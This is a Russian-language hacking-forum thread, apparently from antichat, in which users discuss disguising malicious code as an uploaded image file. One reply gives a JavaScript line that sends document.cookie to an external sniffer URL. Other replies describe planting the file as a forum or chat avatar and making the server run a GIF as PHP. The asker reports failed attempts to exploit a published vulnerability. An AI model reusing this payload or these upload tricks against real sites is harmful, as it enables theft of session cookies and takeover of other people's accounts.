![]() |
валидный графический файл
Обьясните незнающему что такое валидный графический файл с расширением 'phtml' или 'php3, с расширеннием понятно, а вот до него какие то мудрённые слова. В поисковиках с таким вопросом ничего не нашёл, вот и задую этот вопрос тут. Я понимаю это так, что это файл с 2ым расширеннием например "script.php3.jpg" так это или нет? Кому халявный + к репе?
|
Открываешь графический файл блокнотом , удаляешь всё что там есть и вставляешь свой код например код для получаний куков на сниффер
Код:
<script>img=new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> |
За ответ спасибо...
Ну вот с кодом что-то не то или у меня руки кривые. Вообщем не работает, он должен по сути срабатовать при открытии этой якобы картинки или как? |
Угу! Точно ....но это смотря куда ты это впихаешь
|
Я не точно выразился сорри ...значит так. загружаешь фотку на какой нить чат или форум ( это не всегда срабатывает) смотришь в свойство изоброжения ...там увидешь полный путь к изоброжению например _http://forum.antichat.ru/image.php?u=19805&dateline=1140119839 ( это мой аватар ) берешь этот линк если в чате это хочешь сделать пишеш в место домашней странички например ...далее действуй по своей фантазии
|
С этим понятно, только наверно это не совсем то что мне нужно. Слазийти по этому URL поймёти про что я http://www.securitylab.ru/vulnerability/205264.php Сделал всё как сказал Electro, аватар всё равно заливаться нехочет, пробывал манипуляции с расширенниями, но всё равно шляпа. Подскажите где косяк?
|
Для того чтобы сработал этот код в формате гиф нужно гиф интерпритировать как php это для начала....
|
А не мог бы для начала мне обьяснить как это сделать, "гиф интерпритировать как php", можно по проще объяснить что надо сделать? Или чтоб я вам мозги особо не парил дать URL с инфой, где это всё по полочкам разложенно, если есть такая...
|
Народ выручайти, + к репе обещаю...
|
Цитата:
|
| Время: 19:07 |